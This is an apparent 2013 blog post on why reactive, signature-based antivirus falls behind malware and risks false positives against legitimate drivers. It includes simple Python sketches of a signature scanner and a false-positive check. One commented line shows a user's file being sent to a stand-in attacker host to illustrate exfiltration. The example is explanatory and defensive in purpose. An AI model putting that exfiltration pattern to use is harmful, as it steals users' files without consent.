Platt Perspective on Business and Technology

Information systems security and the ongoing consequences of always being reactive – 2

Posted in business and convergent technologies by Timothy Platt on February 12, 2013

This is my second installment in a series on the state of information systems security going into the second decade of the 21st century, and on the challenges that will have to be addressed in moving forward from where we are now (see Part 1, where I focused on the limitations of purely reactive approaches to meeting the challenge of malware and its evolution and distribution, citing antivirus and related security software as a source of working examples).

I continue the general discussion of Part 1 by turning an observation I arrived at toward its end into a question and a challenge here:

• When the basic thrust of software and computer systems security is reactive, when the pace of development of new threat forms is steadily increasing and even accelerating, and when even the best reactive responses continue to fall further and further behind, what should computer systems and information security responders do if their protective efforts are to offer any real value?

One response, obviously, is to reduce the response time-lag between when a new vulnerability is first identified by software producers or anti-malware service providers, and when they start sending out corrective responses. For software producers this means sending out patches and other updates to their products sooner, and even as soon as those fixes can be developed, instead of waiting until they can be sent out as a bundled collection of updates. Microsoft, as a famous and even notorious case in point, used to hold off on releasing most of the patches and corrective updates they sent out until the second Tuesday of each month: their standardized Patch Tuesday scheduled release dates. This meant that some of their updates went out right away, if they happened to be completed and vetted in-house just before that second Tuesday. But many and even most of their patches and fixes were intentionally delayed for release, sometimes for as long as most of a month.

Focusing here on antivirus software development:

• The study of a new piece of malware, the identification of a suitable code snippet for use as a virus definition to block it, and the testing of that definition would all have to be speeded up in a similar way, and at least at as rapid a rate as that of malware development and advance, just to keep reactive protective approaches from falling further behind.
• It is important to note in that context that with the increasing numbers of viruses and other malware being produced and launched, and the increasing rate of their development and release, this becomes an increasingly difficult challenge.
• And with the ever-increasing scale and complexity of the software that has to be protected, the risk that any given antivirus identification snippet also occurs somewhere in the legitimate software it is meant to protect increases too.
• Antivirus software is not, for the most part, written to safeguard one specific software package from compromise. It is written and distributed to protect entire computer systems, with all of their operating system and other software installed, and without harming the functionality of anything that should be in place, while identifying and blocking what it finds to be malware.
• So antivirus software updates have to be tested against a progressively more complex and diverse set of benchmark test computers, with representative software installed, to make sure that a fix identifies and blocks those new viruses without causing harm in and of itself (see the sketch after this list for a simplified picture of what such signature-based definitions amount to).
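To make the reactive, signature-based model described in this list more concrete, here is a minimal sketch, in Python, of what a virus definition amounts to in that model: a distinctive byte pattern extracted from a known malware sample, which a scanner then searches for in the files it inspects. The signature bytes and directory names used here are hypothetical placeholders, and real antivirus engines are far more sophisticated (adding hashes, heuristics, behavioral monitoring and more), but the core matching step is essentially this:

    from pathlib import Path

    # A "virus definition" in the simplest reactive model: a name plus a
    # distinctive byte sequence extracted from a known malware sample.
    # These signature bytes are invented placeholders, for illustration only.
    SIGNATURES = {
        "ExampleWorm.A": bytes.fromhex("deadbeef4d5a9000cafe"),
        "ExampleTrojan.B": b"\x90\x90\xeb\xfespawn_shell",
    }

    def scan_file(path: Path) -> list:
        """Return the names of any signatures found in the file's raw bytes."""
        data = path.read_bytes()
        return [name for name, pattern in SIGNATURES.items() if pattern in data]

    def scan_tree(root: Path) -> dict:
        """Scan every regular file under root and report apparent matches."""
        findings = {}
        for path in root.rglob("*"):
            if path.is_file():
                matches = scan_file(path)
                if matches:
                    findings[path] = matches
        return findings

    if __name__ == "__main__":
        # Hypothetical directory to scan; substitute any path on your own system.
        for path, matches in scan_tree(Path("./test_corpus")).items():
            print(f"{path}: flagged as {', '.join(matches)}")

The entire reactive cycle described in the bullet points above amounts to adding new entries to that signature table and redistributing it to customers, which is why the lag between a new sample's first appearance and the corresponding definition update matters so much.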

And here I note that if you look at the fundamental operations that computer viruses and other malware carry out, every one of them is also carried out, legitimately and even essentially, by user-intended software, and for legitimate and constructive purposes. The problem created by malware lies not in the individual functional steps it performs but in the pattern in which it carries out otherwise valid operations, and in the end goals achieved as a result.
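A minimal code-level sketch can make that point concrete. The same two primitive operations, reading a local file and sending its bytes to a remote host, underlie both a legitimate backup or sync client and a data-stealing tool; the host names and file path below are hypothetical placeholders and the code is illustrative only:

    import socket
    from pathlib import Path

    def send_file(path: Path, host: str, port: int) -> None:
        """Read a local file and transmit its raw bytes to a remote host.
        Every individual step here is a routine, legitimate operation."""
        data = path.read_bytes()                       # ordinary file read
        with socket.create_connection((host, port)) as conn:
            conn.sendall(data)                         # ordinary network write

    # Used one way, this is a backup client the user asked for (hypothetical host):
    #   send_file(Path("~/Documents/report.txt").expanduser(), "backup.example.com", 9000)
    # Used another way, with the same calls in the same order, it is exfiltration:
    #   send_file(Path("~/Documents/report.txt").expanduser(), "attacker.example.net", 9000)
    # Nothing in the individual operations distinguishes the two; only the overall
    # pattern, the destination, and the user's consent and intent do.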

To take that further out of the abstract, I will cite an example that involves some of the most fundamental activity that legitimate software can carry out, and that is also fundamental to making malware work. I begin with a computer’s basic input/output systems. These systems manage communication between the computer, with its internal hardware and software, and the outside world: through mice, keyboards, USB ports and other input sources, and through monitors, speakers and output channels such as those same USB ports, since you can both download from them and upload to them.

These functions are so fundamental that when the relevant operating system software is loaded into memory upon booting up a computer, it is usually loaded first and at the lowest-numbered memory addresses: the functionally shortest addresses and the fastest to process. This volatile storage space is sometimes referred to as page one of memory, and essentially every legitimate software package accesses and utilizes it. Many legitimate programs and apps legitimately make changes to it too, at least to select portions of what is held there. As an example, consider the device drivers used to enable and provide access to peripherals such as a monitor or keyboard, or a CD or DVD player or flash drive.

Now imagine a new anti-malware code snippet definition, included in an antivirus update file, that also matches a similar snippet of code that happens to appear in a legitimate device driver. The greater the range and diversity of legitimate code out there that has to be protected, the more difficult it is to select virus code snippets that are distinct from all of it. So an antivirus update could conceivably block a new virus but at the same time disable some specific brand of game controller for a group of the antivirus vendor’s customers, who happen to be using their computers largely to play their online multi-player games.

I offer this as a perhaps extreme example, in which an inopportune virus definition update completely knocks out something that is both desired on that computer and fundamentally essential to the computer’s user. Even so, with the thousands and even tens of thousands of device drivers out there, and certainly with multiple generational versions of many of them still in use, drivers are a genuine potential source of collateral damage when seeking to block malware. When the hundreds of millions of lines of legitimate software code that reside on computers are considered, and the concern extends to not blocking even partial functionality or degrading legitimate performance, this becomes a larger and more complex issue. As a due diligence concern, these possibilities have to be taken into account when producing and vetting any anti-malware software update. And as noted above, this becomes at least an incrementally bigger challenge every single day.
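A minimal sketch of what that due diligence vetting might look like, again in simplified Python, follows. Before a candidate virus definition ships, it is checked against a corpus of known-good files drawn from the kinds of benchmark test systems described above, and any collision with legitimate code, such as a device driver that happens to contain the same byte sequence, sends the definition back for refinement. The directory name and signature bytes here are hypothetical placeholders:

    from pathlib import Path

    def collides_with_legitimate_code(signature: bytes, corpus_root: Path) -> list:
        """Return every known-good file in the corpus that contains the candidate
        signature bytes; any hit means this definition would cause a false positive."""
        hits = []
        for path in corpus_root.rglob("*"):
            if path.is_file() and signature in path.read_bytes():
                hits.append(path)
        return hits

    if __name__ == "__main__":
        # Hypothetical candidate definition extracted from a new malware sample.
        candidate = bytes.fromhex("deadbeef4d5a9000cafe")
        # Hypothetical corpus of clean operating system files, device drivers and
        # application binaries harvested from benchmark test machines.
        corpus = Path("./known_good_corpus")

        conflicts = collides_with_legitimate_code(candidate, corpus)
        if conflicts:
            print("Candidate definition collides with legitimate files:")
            for path in conflicts:
                print(f"  {path}")  # e.g. a game controller driver, as above
        else:
            print("No collisions found in the benchmark corpus.")

The larger and more diverse that known-good corpus has to be, the more expensive this vetting step becomes, which is exactly the scaling problem described above.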

• So simply accepting a reactive response paradigm and seeking to improve on reaction time cannot suffice, certainly not long-term.
• In my next series installment I am going to turn to more proactive approaches, and to ways of breaking away from this reactive paradigm.

Meanwhile, you can find this and related postings at Ubiquitous Computing and Communications – everywhere all the time.
